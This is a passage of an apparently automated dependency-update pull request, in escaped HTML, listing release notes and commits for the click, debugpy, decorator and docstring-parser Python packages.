href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3371\"\u003e#3371\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for :class:\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n:class:\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e:meth:\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n:class:\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add :func:\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n\u003ca href=\"https://redirect.github.com/pallets/click/issues/3372\"\u003e#3372\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParameter\u003c/code\u003e typing improvements. \u003ca href=\"https://redirect.github.com/pallets/click/issues/2805\"\u003e#2805\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e:class:\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e:attr:\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of :meth:\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor :class:\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/blob/main/CHANGES.md\"\u003eclick's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 8.4.1\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type\nconversion again. {issue}\u003ccode\u003e3458\u003c/code\u003e {pr}\u003ccode\u003e3484\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. {issue}\u003ccode\u003e3277\u003c/code\u003e {pr}\u003ccode\u003e3466\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eEnum\u003c/code\u003e values used as \u003ccode\u003eChoice\u003c/code\u003e options produces a\nvalid completion result. {issue}\u003ccode\u003e3015\u003c/code\u003e {pr}\u003ccode\u003e3471\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. {issue}\u003ccode\u003e3487\u003c/code\u003e {pr}\u003ccode\u003e3493\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. {issue}\u003ccode\u003e3449\u003c/code\u003e {pr}\u003ccode\u003e3482\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eopen_url\u003c/code\u003e on Windows when the file path contains spaces.\n{issue}\u003ccode\u003e2994\u003c/code\u003e {pr}\u003ccode\u003e3478\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 8.4.0\u003c/h2\u003e\n\u003cp\u003eReleased 2026-05-17\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e{class}\u003ccode\u003eParamType\u003c/code\u003e typing improvements. {pr}\u003ccode\u003e3371\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e{class}\u003ccode\u003eParamType\u003c/code\u003e is now a generic abstract base class,\nparameterized by its converted value type.\u003c/li\u003e\n\u003cli\u003e{meth}\u003ccode\u003e~ParamType.convert\u003c/code\u003e return types are narrowed on all\nconcrete types (\u003ccode\u003estr\u003c/code\u003e for {class}\u003ccode\u003eSTRING\u003c/code\u003e, \u003ccode\u003eint\u003c/code\u003e for\n{class}\u003ccode\u003eINT\u003c/code\u003e, etc.).\u003c/li\u003e\n\u003cli\u003e{meth}\u003ccode\u003e~ParamType.to_info_dict\u003c/code\u003e returns specific\n{class}\u003ccode\u003e~typing.TypedDict\u003c/code\u003e subclasses instead of\n\u003ccode\u003edict[str, Any]\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e{class}\u003ccode\u003eCompositeParamType\u003c/code\u003e and the number-range base are now\ngeneric with abstract methods.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRefactor \u003ccode\u003econvert_type\u003c/code\u003e to extract type inference into a private\n\u003ccode\u003e_guess_type\u003c/code\u003e helper, and add {func}\u003ccode\u003etyping.overload\u003c/code\u003e signatures.\n{pr}\u003ccode\u003e3372\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e{class}\u003ccode\u003eParameter\u003c/code\u003e typing improvements. {pr}\u003ccode\u003e2805\u003c/code\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e{class}\u003ccode\u003eParameter\u003c/code\u003e is now an abstract base class, making explicit\nthat it cannot be instantiated directly.\u003c/li\u003e\n\u003cli\u003e{attr}\u003ccode\u003eParameter.name\u003c/code\u003e is now \u003ccode\u003estr\u003c/code\u003e instead of \u003ccode\u003estr | None\u003c/code\u003e.\nWhen \u003ccode\u003eexpose_value=False\u003c/code\u003e, the name is set to \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e instead\nof \u003ccode\u003eNone\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ectx\u003c/code\u003e parameter of {meth}\u003ccode\u003eParameter.get_error_hint\u003c/code\u003e is now\ntyped as \u003ccode\u003eContext | None\u003c/code\u003e, matching the runtime behavior.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSplit string values from \u003ccode\u003edefault_map\u003c/code\u003e for parameters with \u003ccode\u003enargs \u0026gt; 1\u003c/code\u003e\nor {class}\u003ccode\u003eTuple\u003c/code\u003e type, matching environment variable behavior.\n{issue}\u003ccode\u003e2745\u003c/code\u003e {pr}\u003ccode\u003e3364\u003c/code\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAuto-detect \u003ccode\u003etype=UNPROCESSED\u003c/code\u003e for \u003ccode\u003eflag_value\u003c/code\u003e of non-basic types\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6eeb50e948ea136db145280f6f5dd52eca3fa7e5\"\u003e\u003ccode\u003e6eeb50e\u003c/code\u003e\u003c/a\u003e release version 8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/67921d5b71584112eebcbf89596b5f0e6d14c49f\"\u003e\u003ccode\u003e67921d5\u003c/code\u003e\u003c/a\u003e change log and doc fixes (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3495\"\u003e#3495\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/9c41f46a4015700489ad009266edf1f3893d01d1\"\u003e\u003ccode\u003e9c41f46\u003c/code\u003e\u003c/a\u003e Fix changelog and version admonitions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/6cb34774f20598aa288332f8da02c5aee85448a6\"\u003e\u003ccode\u003e6cb3477\u003c/code\u003e\u003c/a\u003e fix skip condition\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/5ee8e3123d8ddece6c47eff9a7a7d4ca478c4f37\"\u003e\u003ccode\u003e5ee8e31\u003c/code\u003e\u003c/a\u003e fix I/O operation on closed file error with CliRunner and echo_via_pager (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3482\"\u003e#3482\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/becbde5cf416441627f779e8dd34e57738ee1c1f\"\u003e\u003ccode\u003ebecbde5\u003c/code\u003e\u003c/a\u003e pager doesn't close std streams\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/a5f5aa6d4012d256ccca24638f2642fc371e9f77\"\u003e\u003ccode\u003ea5f5aa6\u003c/code\u003e\u003c/a\u003e Handle empty bytes in echo (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3493\"\u003e#3493\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/4d3db84b251518e97299a38a5ca4bab3d01873a2\"\u003e\u003ccode\u003e4d3db84\u003c/code\u003e\u003c/a\u003e handle empty bytes in echo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/d42f15b71757de791a5781fb179fd972da9169f5\"\u003e\u003ccode\u003ed42f15b\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eget_parameter_source()\u003c/code\u003e during type conversion and eager callbacks (\u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/click/commit/0baa8db07736fc7ad3d3eed97d4c73b0059c63e1\"\u003e\u003ccode\u003e0baa8db\u003c/code\u003e\u003c/a\u003e Document ctx.params bypass with test and doc\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/click/compare/8.3.2...8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `debugpy` from 1.8.20 to 1.8.21\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/microsoft/debugpy/releases\"\u003edebugpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003edebugpy v1.8.21\u003c/h2\u003e\n\u003cp\u003eFixes for:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eReturn evaluate result in DAP response body instead of writing to stdout: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrevent invalid \u003ccode\u003escopes\u003c/code\u003e request from crashing debug session: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2026\"\u003e#2026\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSkip uninitialized \u003ccode\u003e__slots__\u003c/code\u003e in variable resolver: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2024\"\u003e#2024\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eHandle \u003ccode\u003e-c\u003c/code\u003e arguments that are \u003ccode\u003ebytes\u003c/code\u003e instead of \u003ccode\u003estr\u003c/code\u003e: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix evaluation of variables from chained exception frames: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2018\"\u003e#2018\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eContinueRequest\u003c/code\u003e with a specific \u003ccode\u003ethreadId\u003c/code\u003e no longer resumes all threads (in-process adapter): \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2012\"\u003e#2012\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid strong reference to exceptions during unwind: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2008\"\u003e#2008\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eShow error message on evaluate failures in the hover context: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2006\"\u003e#2006\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDisplay \u003ccode\u003edlerror\u003c/code\u003e output when \u003ccode\u003edlopen\u003c/code\u003e fails: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2000\"\u003e#2000\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace removed \u003ccode\u003epkgutil.get_loader\u003c/code\u003e with \u003ccode\u003eimportlib.util.find_spec\u003c/code\u003e in \u003ccode\u003eget_fullname\u003c/code\u003e: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/1998\"\u003e#1998\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eEnhancements:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd option to ignore all system exit codes: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2017\"\u003e#2017\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePull changes from pydevd up to March 2026: \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2010\"\u003e#2010\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eInfrastructure work:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress Flawfinder false positives on Cython memcpy / read-loop iterators (TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816216\"\u003e#2816216\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816217\"\u003e#2816217\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816218\"\u003e#2816218\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816219\"\u003e#2816219\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816220\"\u003e#2816220\u003c/a\u003e): \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2028\"\u003e#2028\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2029\"\u003e#2029\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2030\"\u003e#2030\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2031\"\u003e#2031\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/microsoft/debugpy/pull/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/maxbachmann\"\u003e\u003ccode\u003e@​maxbachmann\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/mfussenegger\"\u003e\u003ccode\u003e@​mfussenegger\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/sambrightman\"\u003e\u003ccode\u003e@​sambrightman\u003c/code\u003e\u003c/a\u003e for the commits.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/858b05c08555cfc54efa7cf90e70184c7495b38e\"\u003e\u003ccode\u003e858b05c\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816217\"\u003e#2816217\u003c/a\u003e: suppress Flawfinder false positive on Cython JoinPyUnicode ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/f0c34f133ad3eb7992ca50e45e5459f9d58f4be8\"\u003e\u003ccode\u003ef0c34f1\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816216\"\u003e#2816216\u003c/a\u003e: suppress Flawfinder false positive on Cython DIGIT_PAIRS_8 ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/4c70e13d0e3fc8eee5013cd2a41c7a6d752d55d3\"\u003e\u003ccode\u003e4c70e13\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816218\"\u003e#2816218\u003c/a\u003e: suppress Flawfinder false positive on Cython read-loop iter...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/19c2b8c029975a6ba2e4e521d8fbdf5f1b3ed8fd\"\u003e\u003ccode\u003e19c2b8c\u003c/code\u003e\u003c/a\u003e Fix TSA \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2816220\"\u003e#2816220\u003c/a\u003e: suppress Flawfinder false positive on Cython read-loop iter...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/ab9263839637357f3372ffb550395ffbf8ce9f77\"\u003e\u003ccode\u003eab92638\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2031\"\u003e#2031\u003c/a\u003e from StellaHuang95/stellahuang/tsa-2816219-flawfinde...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/12bd4fef7ea5c35248d9f175f5b0218b970fa64c\"\u003e\u003ccode\u003e12bd4fe\u003c/code\u003e\u003c/a\u003e Return evaluate result in DAP response body instead of writing to stdout (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2027\"\u003e#2027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/8bd57a7d446d6ec4d7dd4e580d00cdea193ddcd9\"\u003e\u003ccode\u003e8bd57a7\u003c/code\u003e\u003c/a\u003e Prevent invalid scopes request from crashing debug session (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2026\"\u003e#2026\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/bf118c8d0ec97e584d2f3cfd781f04a745a1334c\"\u003e\u003ccode\u003ebf118c8\u003c/code\u003e\u003c/a\u003e Skip uninitialized \u003cstrong\u003eslots\u003c/strong\u003e in variable resolver (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2024\"\u003e#2024\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/a55be0e6f0700646e0833097ab78b2e4ba68745b\"\u003e\u003ccode\u003ea55be0e\u003c/code\u003e\u003c/a\u003e Potential fix when \u003ccode\u003e-c\u003c/code\u003e arguments are bytes instead of a str (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/microsoft/debugpy/commit/0f037adec6fb2f61ad225849e953188ec349adbc\"\u003e\u003ccode\u003e0f037ad\u003c/code\u003e\u003c/a\u003e Fix evaluation of variables from chained exception frames (\u003ca href=\"https://redirect.github.com/microsoft/debugpy/issues/2018\"\u003e#2018\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/microsoft/debugpy/compare/v1.8.20...v1.8.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `decorator` from 5.2.1 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micheles/decorator/blob/master/CHANGES.md\"\u003edecorator's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.3.1 (2026-05-18)\u003c/h2\u003e\n\u003cp\u003eAdded license SPDX identifier to pyproject.toml (reported by\nChristian Lackas).\u003c/p\u003e\n\u003ch2\u003e5.3.0 (2026-05-17)\u003c/h2\u003e\n\u003cp\u003eAdded official support for Python 3.14 (thanks to Hugo van Kemenade,\nDavid Cain and the GitHub user bersbersbers).\nFixed a bug with \u0026quot;return await\u0026quot; contributed by Kadir Can Ozden.\nMoved decorator.py to a package structure (\u003ccode\u003edecorator/__init__.py\u003c/code\u003e) and\nadded a stub file (\u003ccode\u003edecorator/__init__.pyi\u003c/code\u003e) contributed by Marco Gorelli.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/426e9e35d563ffe356e54bd0f970d153b8f25370\"\u003e\u003ccode\u003e426e9e3\u003c/code\u003e\u003c/a\u003e Bumped the version to 5.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/062ff0e0c33733f2148a5590d118a8570df846d5\"\u003e\u003ccode\u003e062ff0e\u003c/code\u003e\u003c/a\u003e Fixed the dependency on setuptools\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/086ff5d95d4dc550117c12647a4427d70bf8833d\"\u003e\u003ccode\u003e086ff5d\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/5807a83ead31f0de5303fa950ddea49d850d7355\"\u003e\u003ccode\u003e5807a83\u003c/code\u003e\u003c/a\u003e Updated license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/093aced11439251e496b47a9a9369501075e8d1a\"\u003e\u003ccode\u003e093aced\u003c/code\u003e\u003c/a\u003e Updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/e9ced7e63ad9502b3e2a3e3db5f5f1ccc16c5fd6\"\u003e\u003ccode\u003ee9ced7e\u003c/code\u003e\u003c/a\u003e Added license SPDX\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/b3e82ddc04e8d0c18c51eecb30b4a59aee5aac1d\"\u003e\u003ccode\u003eb3e82dd\u003c/code\u003e\u003c/a\u003e Fixed CHANGES.md [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/f1ce8da8522193421436c368849afe886666b4e5\"\u003e\u003ccode\u003ef1ce8da\u003c/code\u003e\u003c/a\u003e Doc fix [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/c924d7c6aa2e47a0627706c385101ff8d558d091\"\u003e\u003ccode\u003ec924d7c\u003c/code\u003e\u003c/a\u003e Updated supported versions [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micheles/decorator/commit/8b83e8cca35f5c773654ce4ae89b4e3f84f430d3\"\u003e\u003ccode\u003e8b83e8c\u003c/code\u003e\u003c/a\u003e Fixed CHANGES [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micheles/decorator/compare/5.2.1...5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `docstring-parser` from 0.17.0 to 0.18.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rr-/docstring_parser/blob/master/CHANGELOG.md\"\u003edocstring-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e0.18 (2026-04-14)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Allow \u003ccode\u003eparse()\u003c/code\u003e to work with missing \u003ccode\u003e__doc__\u003c/code\u003e (thanks to \u003ca href=\"https://github.com/jamesbraza\"\u003e\u003ccode\u003e@​jamesbraza\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Officially support Python 3.14 (thanks to \u003ca href=\"https://github.com/mauvilsa\"\u003e\u003ccode\u003e@​mauvilsa\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Exclude \u003ccode\u003edocstring_parser.tests\u003c/code\u003e from built wheels (thanks to \u003ca href=\"https://github.com/gvalkov\"\u003e\u003ccode\u003e@​gvalkov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEpydoc: Add missing attribute parsing, which includes the \u0026quot;\u003ca href=\"https://github.com/ivar\"\u003e\u003ccode\u003e@​ivar\u003c/code\u003e\u003c/a\u003e\u0026quot;, \u0026quot;\u003ca href=\"https://github.com/cvar\"\u003e\u003ccode\u003e@​cvar\u003c/code\u003e\u003c/a\u003e\u0026quot; and \u0026quot;\u003ca href=\"https://github.com/var\"\u003e\u003ccode\u003e@​var\u003c/code\u003e\u003c/a\u003e\u0026quot; syntax (thanks to \u003ca href=\"https://github.com/Masara\"\u003e\u003ccode\u003e@​Masara\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumpydoc: Add support for defaults in type declarations and improve compose behavior (thanks to \u003ca href=\"https://github.com/jwlodek\"\u003e\u003ccode\u003e@​jwlodek\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.17 (2025-07-21)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eGeneral: Replace poetry with hatchling (thanks to \u003ca href=\"https://github.com/LecrisUT\"\u003e\u003ccode\u003e@​LecrisUT\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneral: Drop support for Python 3.6 and 3.7 (thanks to \u003ca 